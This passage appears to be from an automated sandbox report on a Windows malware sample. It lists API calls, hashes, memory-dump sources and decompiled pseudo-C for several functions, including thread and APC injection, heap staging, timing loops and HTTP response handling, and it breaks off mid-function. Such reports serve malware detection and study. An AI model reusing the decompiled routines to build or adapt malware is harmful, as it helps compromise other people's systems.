                                                                                                                                                                                                                                0x00a61d14
                                                                                                                                                                                                                                0x00a61d19
                                                                                                                                                                                                                                0x00a61d1e
                                                                                                                                                                                                                                0x00a61d23
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61d25
                                                                                                                                                                                                                                0x00a61d28
                                                                                                                                                                                                                                0x00a61d28
                                                                                                                                                                                                                                0x00a61d23
                                                                                                                                                                                                                                0x00a61d06
                                                                                                                                                                                                                                0x00a61cf0
                                                                                                                                                                                                                                0x00a61cda
                                                                                                                                                                                                                                0x00a61cc4
                                                                                                                                                                                                                                0x00a61cae
                                                                                                                                                                                                                                0x00a61d42

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A62020: HeapAlloc.KERNEL32(00000000,?,00A61593,00000030,747863F0,00000000), ref: 00A6202C
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00A61FB8,?,?,?,?,?,00000002,?,?), ref: 00A61C85
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00A61CA7
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00A61CBD
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00A61CD3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00A61CE9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00A61CFF
                                                                                                                                                                                                                                  • Part of subcall function 00A612E2: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 00A6133F
                                                                                                                                                                                                                                  • Part of subcall function 00A612E2: memset.NTDLL ref: 00A61361
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1632424568-0
                                                                                                                                                                                                                                • Opcode ID: e4962205b56823800abba53a4dfd324f927a962b21c3e5c661b97398626aed48
                                                                                                                                                                                                                                • Instruction ID: f0ddacea98a6dfcc22d6432d6d8d0c9c9a520dcd2f198482e82d91dba02de54a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4962205b56823800abba53a4dfd324f927a962b21c3e5c661b97398626aed48
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD217CB1604A0AEFD711DFB9DD80D6ABBFCAF05300B054666E545C7251D774ED05CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A613CC, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0xa64188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0xa6418c;
						if( *0xa6418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0xa64198;
								if( *0xa64198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0xa6418c);
						}
						HeapDestroy( *0xa64190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0xa64188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0xa64190 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0xa641b0 = _a4;
							asm("lock xadd [eax], edi");
							_t23 = E00A61000(E00A61EB4, E00A61971(_a12, 1, 0xa64198, _t41),  &_a8);
							 *0xa6418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                                                                                                                0x00a613cf
                                                                                                                                                                                                                                0x00a613db
                                                                                                                                                                                                                                0x00a613dd
                                                                                                                                                                                                                                0x00a613e0
                                                                                                                                                                                                                                0x00a61456
                                                                                                                                                                                                                                0x00a6145c
                                                                                                                                                                                                                                0x00a6145e
                                                                                                                                                                                                                                0x00a61460
                                                                                                                                                                                                                                0x00a61466
                                                                                                                                                                                                                                0x00a61468
                                                                                                                                                                                                                                0x00a6146d
                                                                                                                                                                                                                                0x00a61470
                                                                                                                                                                                                                                0x00a6147b
                                                                                                                                                                                                                                0x00a6147d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a6147f
                                                                                                                                                                                                                                0x00a61482
                                                                                                                                                                                                                                0x00a61484
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61484
                                                                                                                                                                                                                                0x00a6148c
                                                                                                                                                                                                                                0x00a6148c
                                                                                                                                                                                                                                0x00a61498
                                                                                                                                                                                                                                0x00a61498
                                                                                                                                                                                                                                0x00a613e2
                                                                                                                                                                                                                                0x00a613e3
                                                                                                                                                                                                                                0x00a61403
                                                                                                                                                                                                                                0x00a61409
                                                                                                                                                                                                                                0x00a6140e
                                                                                                                                                                                                                                0x00a61410
                                                                                                                                                                                                                                0x00a6144c
                                                                                                                                                                                                                                0x00a6144c
                                                                                                                                                                                                                                0x00a61412
                                                                                                                                                                                                                                0x00a6141a
                                                                                                                                                                                                                                0x00a61421
                                                                                                                                                                                                                                0x00a61437
                                                                                                                                                                                                                                0x00a6143c
                                                                                                                                                                                                                                0x00a61443
                                                                                                                                                                                                                                0x00a61448
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61448
                                                                                                                                                                                                                                0x00a61443
                                                                                                                                                                                                                                0x00a61410
                                                                                                                                                                                                                                0x00a613e3
                                                                                                                                                                                                                                0x00a614a5

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(00A64188), ref: 00A613EE
                                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00A61403
                                                                                                                                                                                                                                  • Part of subcall function 00A61000: CreateThread.KERNEL32 ref: 00A61017
                                                                                                                                                                                                                                  • Part of subcall function 00A61000: QueueUserAPC.KERNEL32(?,00000000,?), ref: 00A6102C
                                                                                                                                                                                                                                  • Part of subcall function 00A61000: GetLastError.KERNEL32(00000000), ref: 00A61037
                                                                                                                                                                                                                                  • Part of subcall function 00A61000: TerminateThread.KERNEL32(00000000,00000000), ref: 00A61041
                                                                                                                                                                                                                                  • Part of subcall function 00A61000: CloseHandle.KERNEL32(00000000), ref: 00A61048
                                                                                                                                                                                                                                  • Part of subcall function 00A61000: SetLastError.KERNEL32(00000000), ref: 00A61051
                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(00A64188), ref: 00A61456
                                                                                                                                                                                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 00A61470
                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00A6148C
                                                                                                                                                                                                                                • HeapDestroy.KERNEL32 ref: 00A61498
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2110400756-0
                                                                                                                                                                                                                                • Opcode ID: bbe0f42bd1ed5af7460f741e5d1f4e7db1cdf759f37f96ccc9a3a480264521de
                                                                                                                                                                                                                                • Instruction ID: 8886d425cc46da0062da87eae28a691f003a1f9248b1652516d4c6111717cefd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbe0f42bd1ed5af7460f741e5d1f4e7db1cdf759f37f96ccc9a3a480264521de
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B2172B2700205FFCB10DFE9ED889697FB8FB5A7617198625F505E3150EAB08E468B50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A94D07, Relevance: 9.1, APIs: 6, Instructions: 61sleepmemorytimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E00A94D07(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0xa9d270 = _t10;
				if(_t10 != 0) {
					 *0xa9d160 = GetTickCount();
					_t12 = E00A96246(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L00A9B01E();
							_t34 = _t14 + _t16;
							_t18 = E00A9120C(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E00A975DD(_t26) != 0) {
							 *0xa9d298 = 1; // executed
						}
						_t12 = E00A95701(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                                                                                                                                                                                                0x00a94d07
                                                                                                                                                                                                                                0x00a94d0d
                                                                                                                                                                                                                                0x00a94d0e
                                                                                                                                                                                                                                0x00a94d1a
                                                                                                                                                                                                                                0x00a94d20
                                                                                                                                                                                                                                0x00a94d27
                                                                                                                                                                                                                                0x00a94d37
                                                                                                                                                                                                                                0x00a94d3c
                                                                                                                                                                                                                                0x00a94d43
                                                                                                                                                                                                                                0x00a94d45
                                                                                                                                                                                                                                0x00a94d4a
                                                                                                                                                                                                                                0x00a94d50
                                                                                                                                                                                                                                0x00a94d56
                                                                                                                                                                                                                                0x00a94d60
                                                                                                                                                                                                                                0x00a94d64
                                                                                                                                                                                                                                0x00a94d66
                                                                                                                                                                                                                                0x00a94d6b
                                                                                                                                                                                                                                0x00a94d6c
                                                                                                                                                                                                                                0x00a94d6d
                                                                                                                                                                                                                                0x00a94d72
                                                                                                                                                                                                                                0x00a94d78
                                                                                                                                                                                                                                0x00a94d83
                                                                                                                                                                                                                                0x00a94d84
                                                                                                                                                                                                                                0x00a94d8a
                                                                                                                                                                                                                                0x00a94d90
                                                                                                                                                                                                                                0x00a94d9c
                                                                                                                                                                                                                                0x00a94d9e
                                                                                                                                                                                                                                0x00a94d9e
                                                                                                                                                                                                                                0x00a94da8
                                                                                                                                                                                                                                0x00a94da8
                                                                                                                                                                                                                                0x00a94d29
                                                                                                                                                                                                                                0x00a94d2b
                                                                                                                                                                                                                                0x00a94d2b
                                                                                                                                                                                                                                0x00a94db2

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,00A95992,?), ref: 00A94D1A
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A94D2E
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00A95992,?), ref: 00A94D4A
                                                                                                                                                                                                                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,00A95992,?), ref: 00A94D50
                                                                                                                                                                                                                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 00A94D6D
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,00A95992,?), ref: 00A94D8A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 507476733-0
                                                                                                                                                                                                                                • Opcode ID: 28e9e229b919c57e9f13be583a21934e3ee5cafc38d143a1e912cc85597c1051
                                                                                                                                                                                                                                • Instruction ID: 7e2e39ebac9822a965a3c457e4c81204cfc1f5453f10eb40c1d277ea455b01b4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28e9e229b919c57e9f13be583a21934e3ee5cafc38d143a1e912cc85597c1051
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9611E976750704ABDB10ABF4DD4AF9A77E8EB48361F500126FA15C6190FF70D5428760
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A9202A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108synchronizationCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 61%
                                                                                                                                                                                                                                			E00A9202A(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				void* _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				long _t52;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40); // executed
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_t44 =  *0xa9d130(0, 1,  &_v24); // executed
				if(_t44 != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E00A95157(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0xa9d2a4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E00A953BB(_v20);
							if(_v8 == 0) {
								_t52 = E00A950DE(_v24, _t64); // executed
								_v8 = _t52;
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}




















                                                                                                                                                                                                                                0x00a92032
                                                                                                                                                                                                                                0x00a92035
                                                                                                                                                                                                                                0x00a9203e
                                                                                                                                                                                                                                0x00a92041
                                                                                                                                                                                                                                0x00a92044
                                                                                                                                                                                                                                0x00a9204c
                                                                                                                                                                                                                                0x00a9214a
                                                                                                                                                                                                                                0x00a92150
                                                                                                                                                                                                                                0x00a92158
                                                                                                                                                                                                                                0x00a92160
                                                                                                                                                                                                                                0x00a92167
                                                                                                                                                                                                                                0x00a92167
                                                                                                                                                                                                                                0x00a9215a
                                                                                                                                                                                                                                0x00a9215d
                                                                                                                                                                                                                                0x00a9215d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9215d
                                                                                                                                                                                                                                0x00a92055
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a92062
                                                                                                                                                                                                                                0x00a9206a
                                                                                                                                                                                                                                0x00a92141
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a92141
                                                                                                                                                                                                                                0x00a92076
                                                                                                                                                                                                                                0x00a9207b
                                                                                                                                                                                                                                0x00a92080
                                                                                                                                                                                                                                0x00a9212f
                                                                                                                                                                                                                                0x00a92136
                                                                                                                                                                                                                                0x00a92136
                                                                                                                                                                                                                                0x00a9213c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a92086
                                                                                                                                                                                                                                0x00a92086
                                                                                                                                                                                                                                0x00a92086
                                                                                                                                                                                                                                0x00a92086
                                                                                                                                                                                                                                0x00a9208b
                                                                                                                                                                                                                                0x00a9208d
                                                                                                                                                                                                                                0x00a9208d
                                                                                                                                                                                                                                0x00a9209a
                                                                                                                                                                                                                                0x00a920a2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a920a4
                                                                                                                                                                                                                                0x00a920b1
                                                                                                                                                                                                                                0x00a920b7
                                                                                                                                                                                                                                0x00a920b7
                                                                                                                                                                                                                                0x00a920ba
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a920c7
                                                                                                                                                                                                                                0x00a920db
                                                                                                                                                                                                                                0x00a92111
                                                                                                                                                                                                                                0x00a92114
                                                                                                                                                                                                                                0x00a92117
                                                                                                                                                                                                                                0x00a9211f
                                                                                                                                                                                                                                0x00a92125
                                                                                                                                                                                                                                0x00a9212a
                                                                                                                                                                                                                                0x00a9212a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9211f
                                                                                                                                                                                                                                0x00a920dd
                                                                                                                                                                                                                                0x00a920e4
                                                                                                                                                                                                                                0x00a920ec
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a920ee
                                                                                                                                                                                                                                0x00a920f4
                                                                                                                                                                                                                                0x00a920fc
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a92103
                                                                                                                                                                                                                                0x00a92103
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a92103
                                                                                                                                                                                                                                0x00a920fc
                                                                                                                                                                                                                                0x00a920c4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a92106
                                                                                                                                                                                                                                0x00a92106
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A9214A
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A920BE
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000), ref: 00A920CE
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A920EE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 35602742-1701360479
                                                                                                                                                                                                                                • Opcode ID: 15f9620144b975d833c73b08f01f94eeb46ec2605ece1901a3f8f9b1c3709dc0
                                                                                                                                                                                                                                • Instruction ID: 75aa8a22aa76a1ab6686217b674aabe13fd349bf2a5a943709bef2e64e6fc6b4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15f9620144b975d833c73b08f01f94eeb46ec2605ece1901a3f8f9b1c3709dc0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5941F874A00209FFDF20DFE4D989AAEBBB9FB04304F20456AE502E7251DB319E55DB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A945CF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                			E00A945CF(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0xa9d364; // 0x4fd95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xa9d364; // 0x4fd95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0xa9d030) {
					HeapFree( *0xa9d270, 0, _t8);
				}
				_t9 = E00A95341(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0xa9d364; // 0x4fd95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                                                                                                                                                                                                                0x00a945cf
                                                                                                                                                                                                                                0x00a945cf
                                                                                                                                                                                                                                0x00a945d8
                                                                                                                                                                                                                                0x00a945e8
                                                                                                                                                                                                                                0x00a945e8
                                                                                                                                                                                                                                0x00a945ed
                                                                                                                                                                                                                                0x00a945f2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a945e2
                                                                                                                                                                                                                                0x00a945e2
                                                                                                                                                                                                                                0x00a945f4
                                                                                                                                                                                                                                0x00a945f8
                                                                                                                                                                                                                                0x00a9460a
                                                                                                                                                                                                                                0x00a9460a
                                                                                                                                                                                                                                0x00a94615
                                                                                                                                                                                                                                0x00a9461a
                                                                                                                                                                                                                                0x00a9461d
                                                                                                                                                                                                                                0x00a94622
                                                                                                                                                                                                                                0x00a94626
                                                                                                                                                                                                                                0x00a9462c

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(04FD9570), ref: 00A945D8
                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,00A95884), ref: 00A945E2
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,00A95884), ref: 00A9460A
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(04FD9570), ref: 00A94626
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 58946197-1536154274
                                                                                                                                                                                                                                • Opcode ID: 667dadb85b1a3fb58d868f0de3116c6d0104863d3f000f8f0e19af80692ad7f0
                                                                                                                                                                                                                                • Instruction ID: 947c2b4acb4e641a27cf026d493ac010625a63e7efbd0fea315a15b7da6a8ecd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 667dadb85b1a3fb58d868f0de3116c6d0104863d3f000f8f0e19af80692ad7f0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87F0DA70704640EBDF24DFE9EE49F177BE4AB15745F054416F501CB261CB20E992CB25
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A95701, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                			E00A95701(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00A92CC9();
				if(_t21 != 0) {
					_t59 =  *0xa9d294; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xa9d294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xa9d12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00A92A45( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xa9d2e0; // 0x453a5a8
					if( *0xa9d294 > 5) {
						_t8 = _t26 + 0xa9e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xa9e9f9; // 0x44283a44
						_t27 = _t7;
					}
					E00A9276B(_t27, _t27);
					_t31 = E00A91DF5(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0xa9d2a8 =  *0xa9d2a8 ^ 0x81bbe65d;
						_t32 = E00A95157(0x60);
						 *0xa9d364 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xa9d364; // 0x4fd95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xa9d364; // 0x4fd95b0
							 *_t51 = 0xa9e823;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xa9d270, 0, 0x43);
							 *0xa9d300 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xa9d294; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xa9d2e0; // 0x453a5a8
								_t13 = _t58 + 0xa9e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xa9c2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00A99DE1( ~_v8 &  *0xa9d2a8, 0xa9d00c); // executed
								_t42 = E00A9235B(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00A96EDD(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00A99FF2(_t61, _t65, _v8); // executed
